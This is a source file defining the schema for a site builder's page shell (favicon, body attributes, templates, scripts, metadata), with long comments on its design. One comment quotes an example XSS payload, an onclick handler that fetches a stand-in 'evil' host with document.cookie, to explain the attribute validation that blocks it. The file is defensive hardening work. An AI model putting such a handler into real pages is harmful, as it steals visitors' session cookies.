// The document a site wraps its pages in.
//
// Everything here describes the SHELL — the head, the body tag, the template
// the three element streams are slotted into, and the script and style injected
// around them. None of it is content: a page's content is its elements, and a
// section's is its markup. This is what surrounds both.
//
// Ported from the archived project's `@repoflow/schema/page-config`
// (`archive/recovered/stack-pkg`), which is the same gen-2 predecessor the
// composition model came from. Two fields of that shape are deliberately not
// here:
//
//   `libraryid` / mountpoints — a publication model this service does not have.
//
// It also lost `widget: "url"` on `faviconUrl` for a while, and has it back —
// see the note on that field.
import { types, values, storedTypes, storedValues } from "@common/schema/content/fields";

// The templating layer, declared once for a section, a `code` element and now a
// site's configuration — see @common/schema/content/fields. A site's `types`
// declare slots that every page of the site can interpolate, and `values` fill
// them: that is what makes a brand colour or a support address one edit rather
// than one per section.
export { types, values, storedTypes, storedValues };

export const title = {
  label: "Title",
  type: "string",
  default: "",
};

export const description = {
  label: "Description",
  type: "string",
  textarea: true,
  default: "",
};

// THE ONE FIELD HERE WITH A PICKER BEHIND IT.
//
// `widget: "url"` is gen-2's and was dropped in the port with a note saying
// why: the url widget in npm/pkg/@repoflow/components/widgets imports
// `components/file-selector` and `components/file`, neither of which was
// ported, so naming it threw `widget.missing:url` from inside every render of
// this type — and a missing widget takes down every screen that touches the
// document carrying it, not only the ones that show the field.
//
// The widget is pagews' own now (app/code/src/widgets/url) and the picker
// behind it lists this site's Images, which is where a favicon comes from. The
// field is still a text box: a favicon on a CDN is a perfectly ordinary answer
// and a picker-only control would have taken it away.
//
// `type: "string"` and no `/URL` ref, deliberately. What the picker produces is
// relative — `/file/<kind>/<fileId>/content/<name>` — and `/URL` is
// `^https?://`, so the pattern that looks like tightening would refuse every
// URL this service can mint. The scheme allowlist this field and the two beside
// it wanted (P180) is in @common/render/page as `assetUrl`, and it is
// render-side for exactly that reason: that is where a relative URL can be seen
// for what it is rather than refused for what it is missing.
export const faviconUrl = {
  label: "Favicon",
  type: "string",
  widget: "url",
  default: "",
};

export const bodyClasses = {
  label: "Body class",
  type: "string",
  default: "",
};

// `data-theme="dark" data-analytics='off' hidden` — attributes spliced into the
// <body> tag, raw, because escaping them would emit one literal string instead
// of several attributes.
//
// Raw was harmless while the only thing that composed a document was the
// preview's sandboxed iframe. A served page is a real document on a real
// origin, and this is the one raw field in the shell that is not markup a
// tenant is entitled to write: a `>` here does not add content to the page, it
// CLOSES the <body> tag early and puts whatever follows outside it.
//
// So it is constrained to attribute syntax — a name, optionally `=` and a
// quoted value, repeated — with `<` and `>` forbidden inside the quotes too.
// The pattern is exported because the composer applies it a second time, on
// read: rows written before this constraint existed cannot be caught here.
//
// SYNTAX IS NOT ENOUGH, which is what P174 was. A name/value pair is exactly
// what `onclick="fetch('//evil/'+document.cookie)"` is, so the check above
// passed it, the composer wrote it into the tag and preview/mount.js copied it
// onto the live <body> with setAttribute — which is the call that REGISTERS a
// handler. On a served page that is script on the tenant's own document, which
// they are already entitled to through `inlineScript`; in the editor's frame,
// which is same-origin with the app until P142's second hostname lands, it is
// script on the app's origin that nobody typed into a script field.
//
// `(?![oO][nN])` on the name is the whole of the fix, and it is deliberately
// the crude form: every event handler content attribute HTML has is `on`
// followed by the event name, so refusing the prefix cannot go stale as the
// spec adds them, where a list of the sixty-odd current ones would. It costs
// an author the ability to write a non-handler attribute that happens to begin
// with those two letters (`one="1"`); nothing on dev uses this field at all,
// and the trade is not close.
//
// A NAME IS NOT A SEPARATOR EITHER. `\s+` between attributes rather than the
// `\s*` this used to end each repetition with, and that is the difference
// between linear and exponential. With optional whitespace, `aaaa` can be one
// name or four, so a string of n name characters that ends in something the
// pattern cannot match — `'a'.repeat(n) + '<'` — has 2^(n-1) ways to be split
// and the engine tries all of them: measured before this change at n=18 → 3.5
// ms, n=22 → 48 ms, n=26 → 704 ms, doubling every two characters, on a field
// with no `maxLength` behind a form that validates on every keystroke. With a
// mandatory separator each split fails at the separator instead of recursing,
// and 10 000 characters test in 0.07 ms.
//
// Two attributes with no space between them — `a="1"b="2"` — are refused by
// that separator where they used to be accepted. It is a parse error that
// browsers recover from, no row on dev has ever held one, and a rule an author
// can state ("one space between attributes") is worth more here than the
// recovery.
const ATTRIBUTE_NAME = "(?![oO][nN])[a-zA-Z_:][-a-zA-Z0-9_:.]*";
const ATTRIBUTE_VALUE = "(?:\"[^\"<>]*\"|'[^'<>]*')";
const ATTRIBUTE = `${ATTRIBUTE_NAME}(?:\\s*=\\s*${ATTRIBUTE_VALUE})?`;

export const BODY_ATTRIBUTES_PATTERN = `^\\s*(?:${ATTRIBUTE}(?:\\s+${ATTRIBUTE})*\\s*)?$`;

export const bodyAttributes = {
  label: "Body attributes",
  type: "string",
  pattern: BODY_ATTRIBUTES_PATTERN,
  // A ceiling on the field, not a check the pattern needs any more — the
  // pattern is linear now. It is here because the two are separate promises:
  // the pattern says the string is attribute syntax, this says the <body> tag
  // of a served page cannot be made arbitrarily long by one save. The longest
  // thing anyone writes here is a handful of `data-` pairs.
  maxLength: 512,
  default: "",
};

// The EJS template the three element streams are slotted into. It is the one
// field here that can break a page outright, which is why it has a default
// rather than starting empty: `header`, `content` and `footer` are the only
// locals the composer passes, and a template that names none of them renders a
// document with no content in it and no error to say why.
export const bodyTemplate = {
  label: "Body template",
  type: "string",
  widget: "html",
  // Non-empty, and this is the only field here that is. An empty template
  // composes a document with a head and nothing under it — every element the
  // page has, silently dropped, with no error to say why. Refusing to save it
  // is cheaper than a renderer guessing what was meant.
  minLength: 1,
  default: `<%-header%>
<%-content%>
<%-footer%>`,
};

// The same template as a PAGE overrides it with, where empty is a real answer
// and the site's is what an empty one means.
//
// `bodyTemplate` above cannot be empty and must not become able to: it is the
// SITE's, and a site with no template composes a document with every element
// dropped and nothing to say why. A page's copy is the opposite case — most
// pages want their site's shell, so the value that has to be expressible is
// "nothing", and `mergeConfig` in @common/render/page reads it as "use the
// site's". That is gen-2's own seed, which created a page with
// `{ ...defaults, bodyTemplate: "" }` for exactly this reason
// (`archive/recovered/stack-env/code/site-backend/src/model/site-page`).
//
// So: no `minLength`, and a default of "". Every other property of the shell
// already has an empty default and already means "fall through" when it holds
// one, which is why this is the only field the override document restates.
export const overrideBodyTemplate = {
  label: "Body template",
  type: "string",
  widget: "html",
  default: "",
};

export const inlineHead = {
  label: "Head content",
  type: "string",
  widget: "html",
  default: "",
};

export const inlineStyle = {
  label: "Site styles",
  type: "string",
  widget: "style",
  default: "",
};

export const inlineScript = {
  label: "Site scripts",
  type: "string",
  widget: "script",
  default: "",
};

// Arrays of plain strings, and deliberately without a `widget:` name — which
// makes form-schema resolve them to `tags`, its default for `array` of
// `string`. That default is NOT what these should look like: a chip per URL is
// cramped for a CDN path and splits one on a stray comma. The screen asks for
// `list` instead, per field, and the site config screen does
// (routes/sites/site/view) — exactly as the archived screen did
// (`archive/recovered/stack-pkg/src/components/page-config/config/developer`),
// which is why its schema carries no `widget:` on them either.
//
// The name stays out of this file because a `widget:` here is a demand on every
// screen that touches the type — including any that has not registered `list`,
// which is not in form-schema's built-in table — and getField() resolves a
// widget for EVERY property of a type, not only the ones a screen displays. A
// name here would throw `widget.missing:list` from inside a render that never
// meant to show the field. That has taken a screen down twice.
export const includesStyle = {
  label: "Included styles",
  type: "array",
  items: {
    type: "string",
    minLength: 1,
    default: "",
  },
  default: [],
};

export const includesScript = {
  label: "Included scripts",
  type: "array",
  items: {
    type: "string",
    minLength: 1,
    default: "",
  },
  default: [],
};

// `<meta name="..." content="...">` and its two siblings. `type` is the
// ATTRIBUTE the name goes in, which is why it is an enum of three rather than
// free text — `<meta name=` and `<meta property=` are different tags to every
// crawler that reads them.
export const metadataList = {
  label: "Metadata",
  type: "array",
  items: { $ref: "/PageConfig/Metadata" },
  default: [],
};

// Name/value pairs a template reaches through `{{attributes.x}}`. Distinct from
// `values`: an attribute is a flat string the shell itself interpolates, a
// value is typed by the site's `types` and belongs to whatever renders it.
export const attributes = {
  label: "Attributes",
  type: "array",
  items: { $ref: "/PageConfig/Attribute" },
  // No `index`. It would turn on the list widget's drag-reorder, keyed by the
  // named property — and two rows added before either is named both key on the
  // empty string, which is a duplicate React key and a row that edits the wrong
  // entry. Order does not mean anything here anyway: these are looked up by
  // name, not walked.
  default: [],
};

// `content` was the third option in the archived project. It is not an
// attribute a `<meta>` tag can be keyed by — it is the other half of the pair —
// so a row saved with it emitted `<meta content="x" content="y">`. `property`
// is the option that was missing, and is what every OpenGraph tag needs.
export const metadataType = {
  label: "Type",
  type: "string",
  enum: ["name", "http-equiv", "property"],
  default: "name",
  minLength: 1,
};

export const metadataValue = {
  label: "Name",
  type: "string",
  default: "",
};

export const metadataContent = {
  label: "Content",
  type: "string",
  default: "",
};

export const attributeName = {
  label: "Name",
  type: "string",
  default: "",
};

export const attributeValue = {
  label: "Value",
  type: "string",
  default: "",
};
